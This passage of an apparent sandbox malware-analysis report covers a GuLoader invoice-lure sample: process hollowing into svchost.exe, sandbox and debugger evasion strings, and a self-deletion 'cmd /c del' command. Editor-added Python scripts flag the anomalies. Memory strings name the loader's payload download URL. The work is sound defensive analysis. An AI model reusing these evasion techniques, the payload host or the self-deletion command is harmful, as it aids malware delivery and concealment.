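Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F3C90 NtOpenThread, 8_2_1E8F3C90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2D50 NtWriteVirtualMemory, 8_2_1E8F2D50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B20 NtQueryInformationProcess, 8_2_1E8F2B20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F4260 NtSetContextThread, 8_2_1E8F4260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72C30 NtMapViewOfSection,LdrInitializeThunk, 11_2_03B72C30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B74260 NtSetContextThread, 11_2_03B74260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72ED0 NtResumeThread, 11_2_03B72ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72E00 NtQueueApcThread, 11_2_03B72E00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B73C90 NtOpenThread, 11_2_03B73C90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72C50 NtUnmapViewOfSection, 11_2_03B72C50
""".strip().splitlines()

if __name__ == "__main__":
    for proc, result in sorted(triage(SAMPLE_LINES).items()):
        present = [s for s, ok in result.items() if ok]
        print(f"{proc}: {', '.join(present) or 'no complete stage'}")
```

Run against the sample, the first draft_inv dec21.exe process (index 1) only completes the remote-write stage, the re-executed copy (index 8) completes all four, and svchost.exe (index 11) completes hollowing and APC injection; that split matches the two-stage loader behaviour the rest of this report describes.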
Abnormal high CPU Usage
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: draft_inv dec21.exe, 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameprajesselv.exe vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000001.00000002.6382057961.0000000002C40000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameprajesselv.exeFE2XCx Frak vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000000.6373811116.0000000000421000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameprajesselv.exe vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000002.6919082626.00000000000DC000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamesvchost.exej% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesvchost.exej% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000003.6915123008.00000000008F9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesvchost.exej% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000002.6934097497.000000001EB50000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs draft_inv dec21.exe
Source: draft_inv dec21.exe Binary or memory string: OriginalFilenameprajesselv.exe vs draft_inv dec21.exe
PE file contains strange resources
Source: draft_inv dec21.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: zbcdidj04hd0ibmx.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section loaded: edgegdi.dll (2 occurrences)
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edgegdi.dll
Source: draft_inv dec21.exe Virustotal: Detection: 26%
Source: draft_inv dec21.exe Metadefender: Detection: 20%
Source: draft_inv dec21.exe ReversingLabs: Detection: 17%
Source: draft_inv dec21.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\draft_inv dec21.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: unknown Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
Source: C:\Users\user\Desktop\draft_inv dec21.exe File created: C:\Users\user\AppData\Local\Temp\~DF3F74DA73951D2623.TMP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@68/20
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: wntdll.pdbUGP source: draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: draft_inv dec21.exe, draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source: Binary string: svchost.pdb source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp
Source: Binary string: svchost.pdbUGP source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp
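The process tree in the "Process created" lines above is the strongest behavioural evidence in this section: a 32-bit svchost.exe started by explorer.exe rather than services.exe and without a -k service-group argument, which then spawns cmd.exe to delete the sample that sits at the top of the tree, after the sample had first re-executed its own image. The Python below is an added example by the editor, not part of this report or of Joe Sandbox: it parses "Process created" lines in the format used above, de-duplicates the double listing (process tree plus behaviour view), and applies four hand-written rules for those anomalies. The rules are the editor's own assumptions; the embedded sample is the creation lines copied from this section plus one constructed, benign services.exe to svchost.exe line to show that a normal service host does not trigger them.

```python
import re
from dataclasses import dataclass

# Matches the report's "Process created" lines. The image path is taken up to the
# first ".exe"; the rest of the line is the command line. The trailing
# "Jump to behavior" link caption that the exported report text carries is dropped.
PROC_RE = re.compile(
    r"^Source:\s+(?P<parent>.+?)\s+Process created:\s+(?P<image>.+?\.exe)"
    r"(?:\s+(?P<cmdline>.*?))?(?:\s+Jump to behavior)?\s*$",
    re.IGNORECASE,
)
# "cmd /c del <path>" with or without quotes around the path.
DEL_RE = re.compile(r'/c\s+del\s+"?(?P<target>[^"]+?)"?\s*$', re.IGNORECASE)


@dataclass(frozen=True)
class Proc:
    parent: str   # parent image path, or "unknown" where the report has no parent
    image: str
    cmdline: str


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_process_tree(lines):
    """Unique (parent, image, cmdline) triples, in report order."""
    procs, seen = [], set()
    for line in lines:
        m = PROC_RE.match(line.strip())
        if not m:
            continue
        p = Proc(m.group("parent"), m.group("image"), m.group("cmdline") or "")
        if p not in seen:   # the report lists each creation twice (tree + behaviour view)
            seen.add(p)
            procs.append(p)
    return procs


def find_anomalies(procs):
    """Return (rule, subject) pairs. The rules are the editor's own, chosen for this tree:
    - svchost.exe whose parent is not services.exe
    - svchost.exe started without a "-k <group>" argument
    - cmd.exe deleting an image that was itself executed in this tree (self deletion)
    - a process re-executing its own image
    """
    images = {p.image.lower() for p in procs}
    findings = []
    for p in procs:
        name, parent = basename(p.image), basename(p.parent)
        if name == "svchost.exe":
            if parent != "services.exe":
                findings.append(("svchost_unexpected_parent", parent))
            if "-k" not in p.cmdline.split():
                findings.append(("svchost_without_service_group", name))
        if name == "cmd.exe":
            m = DEL_RE.search(p.cmdline)
            if m and m.group("target").lower() in images:
                findings.append(("deletes_executed_sample", parent))
        if parent == name:
            findings.append(("self_reexecution", name))
    return findings


# Constructed sample: the "Process created" lines copied from this report section
# (including the duplicated behaviour-view entries), plus one constructed benign
# line at the end that is NOT from the report.
SAMPLE_LINES = r"""
Source: unknown Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: unknown Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\draft_inv dec21.exe" Jump to behavior
Source: C:\Windows\System32\services.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
""".strip().splitlines()

if __name__ == "__main__":
    for rule, subject in find_anomalies(parse_process_tree(SAMPLE_LINES)):
        print(f"{rule}: {subject}")
```

On the sample this yields exactly four findings: the self re-execution of draft_inv dec21.exe, the svchost.exe parented by explorer.exe, the same svchost.exe lacking a -k argument, and the cmd.exe spawned by svchost.exe that deletes the executed sample. The constructed services.exe line produces nothing, which is the false-positive check worth keeping when turning these rules into a real detection.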

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.6378969703.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0040846A push ds; retf 1_2_00408472
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_00407608 push ebx; iretd 1_2_00407609
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_00405C16 push ss; iretd 1_2_00405BC7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_004094E5 push esi; iretd 1_2_004094E7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_00405B7D push ss; iretd 1_2_00405BC7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_00407F07 push ebp; retf 1_2_00407F0F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_00408119 push ebx; iretd 1_2_0040811B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242084B push ss; retf 1_2_02420852
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02425A48 push edi; ret 1_2_02425A89
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02425A84 push edi; ret 1_2_02425A89
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02422B3A push cs; iretd 1_2_02422B3F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02420BC1 push FFB8EB81h; ret 1_2_02420BC6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242399C push esp; ret 1_2_024239EF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B08CD push ecx; mov dword ptr [esp], ecx 8_2_1E8B08D6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8897A1 push es; iretd 8_2_1E8897A8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8821AD pushad ; retf 0004h 8_2_1E88223F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B021AD pushad ; retf 0004h 11_2_03B0223F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B097A1 push es; iretd 11_2_03B097A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B308CD push ecx; mov dword ptr [esp], ecx 11_2_03B308D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D95640 push 6F0B6D34h; retf 11_2_02D95645
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9B7D5 push eax; ret 11_2_02D9B828
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9A7A6 push es; ret 11_2_02D9A757
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D95B58 push edx; iretd 11_2_02D95B64
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D95B77 push 6371F8CDh; retf 11_2_02D95B7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9B88C push eax; ret 11_2_02D9B892
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9B82B push eax; ret 11_2_02D9B892
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9B822 push eax; ret 11_2_02D9B828
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D94E9C push 0D2B169Ah; retf 11_2_02D94EBD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9CCF6 push dword ptr [A92E284Ah]; ret 11_2_02D9CD17

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\svchost.exe Process created: /c del "C:\Users\user\Desktop\draft_inv dec21.exe"
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process information set: NOOPENFILEERRORBOX (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\draft_inv dec21.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe (2 occurrences)
Source: C:\Users\user\Desktop\draft_inv dec21.exe File opened: C:\Program Files\qga\qga.exe (2 occurrences)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://STATUSWAR.INFO/GHDFR/BIN_ROLFDOAA61.BIN
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5836 Thread sleep time: -265000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 2524 Thread sleep count: 111 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 2524 Thread sleep time: -222000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_024308D3 rdtsc 1_2_024308D3
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\draft_inv dec21.exe API coverage: 1.1 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 2.1 %
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\draft_inv dec21.exe System information queried: ModuleInformation
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: explorer.exe, 0000000A.00000000.6845627993.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6746869625.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6797467749.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7078654239.00000000099AD000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW(( H
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWH
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: draft_inv dec21.exe, 00000008.00000003.6915277582.0000000000886000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726846989.0000000000886000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6725996771.0000000000886000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6920648507.0000000000886000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6766142361.0000000010AD9000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097429161.0000000010AD9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000000.6865990791.0000000011420000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6768580400.0000000011420000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6817962178.0000000011420000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW q
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\draft_inv dec21.exe Thread information set: HideFromDebugger (2 occurrences)
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_024308D3 rdtsc 1_2_024308D3
Enables debug privileges
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242FFE4 mov eax, dword ptr fs:[00000030h] 1_2_0242FFE4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02431671 mov eax, dword ptr fs:[00000030h] 1_2_02431671
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242F610 mov eax, dword ptr fs:[00000030h] 1_2_0242F610
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242C50C mov eax, dword ptr fs:[00000030h] 1_2_0242C50C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAE89 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAE89 (2 occurrences)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DBE80 mov eax, dword ptr fs:[00000030h] 8_2_1E8DBE80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECEA0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ECEA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2EB8 mov eax, dword ptr fs:[00000030h] 8_2_1E8E2EB8 (2 occurrences)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E970EAD mov eax, dword ptr fs:[00000030h] 8_2_1E970EAD (2 occurrences)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C1EB2 (8 occurrences)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h] 8_2_1E8C1EB2 (4 occurrences)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E979ED2 mov eax, dword ptr fs:[00000030h] 8_2_1E979ED2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F1ED8 mov eax, dword ptr fs:[00000030h] 8_2_1E8F1ED8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984EC1 mov eax, dword ptr fs:[00000030h] 8_2_1E984EC1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBED0 mov eax, dword ptr fs:[00000030h] 8_2_1E8EBED0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E1EED mov eax, dword ptr fs:[00000030h] 8_2_1E8E1EED
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E1EED mov eax, dword ptr fs:[00000030h] 8_2_1E8E1EED
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E1EED mov eax, dword ptr fs:[00000030h] 8_2_1E8E1EED
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h] 8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h] 8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h] 8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h] 8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3EE2 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3EE2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E953EFC mov eax, dword ptr fs:[00000030h] 8_2_1E953EFC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96EEE7 mov eax, dword ptr fs:[00000030h] 8_2_1E96EEE7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3E01 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3E01
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h] 8_2_1E8B6E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h] 8_2_1E8B6E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h] 8_2_1E8B6E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h] 8_2_1E8B6E00
